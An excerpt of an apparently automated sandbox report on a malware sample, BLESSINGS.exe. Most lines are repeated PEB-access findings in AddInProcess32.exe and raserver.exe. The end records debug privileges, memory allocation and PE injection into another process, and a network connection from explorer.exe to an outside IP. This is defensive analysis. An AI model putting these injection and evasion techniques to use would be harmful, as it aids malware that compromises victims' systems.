          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01778EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04540050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04540050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04547D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04563D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04554D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04554D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04554D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04551DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04551DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04551DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04543A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04558E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04538A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04564A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04564A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04568EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04553B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04553B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04524F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04524F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.241.137 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
